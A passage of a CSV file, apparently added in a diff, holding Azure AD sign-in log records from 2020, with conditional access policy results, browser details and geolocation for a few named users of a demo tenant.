'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0ea77311500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8d371308-4e1f-476f-97d6-c0ea77311500,SigninLogs,Sucess,41.90428925,-85.99833679
+993,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:52.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,98cc469f-40db-0000-54b3-3e2255a3e1d9,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d774c493-40b1-4743-b785-3f4a0dc91300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d774c493-40b1-4743-b785-3f4a0dc91300,SigninLogs,Failed,41.90428925,-85.99833679
+994,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f2cc469f-e0ca-0000-5421-793da02b04e5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-94704b0e1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-94704b0e1400,SigninLogs,Sucess,41.90428925,-85.99833679
+995,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:51.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cee373e3-2f7d-4c7a-879d-5902a9855db6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",6c1d2f35-9fdd-4afe-865b-10426bb61400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6c1d2f35-9fdd-4afe-865b-10426bb61400,SigninLogs,Sucess,41.90428925,-85.99833679
+996,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:22.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73cc469f-b0ea-0000-5683-4f44740c01be,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",37105d23-9607-4aeb-a84b-5fa3a3941400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,37105d23-9607-4aeb-a84b-5fa3a3941400,SigninLogs,Sucess,41.90428925,-85.99833679
+997,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9ea3de1500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03932e54-fdb0-4c07-8405-8b9ea3de1500,SigninLogs,Sucess,33.0175209,35.44601059
+998,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:28.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2678ad36-a94c-4662-8eaa-d5b82206ddcf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",206c879d-2196-4a7a-8124-0022625b1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,206c879d-2196-4a7a-8124-0022625b1400,SigninLogs,Sucess,41.90428925,-85.99833679
+999,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:21.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,73cc469f-b0ea-0000-5683-4f44740c01be,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f6c2991500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f6c2991500,SigninLogs,Failed,41.90428925,-85.99833679
+1000,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9ea3de1500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03932e54-fdb0-4c07-8405-8b9ea3de1500,SigninLogs,Sucess,33.0175209,35.44601059
+1001,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:47.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c5413038-ad63-4595-9099-1bd7f5066e4a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ba30877-fe5d-4dc4-8c19-e13fc2391400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5ba30877-fe5d-4dc4-8c19-e13fc2391400,SigninLogs,Sucess,41.90428925,-85.99833679
